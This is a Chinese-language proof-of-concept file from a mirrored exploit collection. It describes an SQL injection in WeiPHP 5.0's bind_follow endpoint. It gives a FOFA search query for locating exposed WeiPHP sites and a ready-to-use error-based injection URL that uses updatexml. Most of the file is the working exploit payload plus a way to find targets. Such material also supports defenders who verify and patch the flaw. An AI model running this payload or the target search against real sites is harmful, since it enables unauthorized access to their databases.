admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/CMS漏洞/WeiPHP5.0 bind_follow SQL注入漏洞.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

29 lines
478 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# WeiPHP5.0 bind_follow SQL注入漏洞
## 漏洞描述
Weiphp5.0 所有使用了 wp_where() 函数并且参数可控的SQL查询均受到影响前台后台均存在注入。
## 漏洞影响
```
Weiphp5.0
```
## FOFA
```
app="WeiPHP"
```
## 漏洞复现
登陆页面
![img](./images/202202162318466.png)
验证POC
```php
/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(%271%27),0x7e),1)--+
```
Reference in New Issue View Git Blame Copy Permalink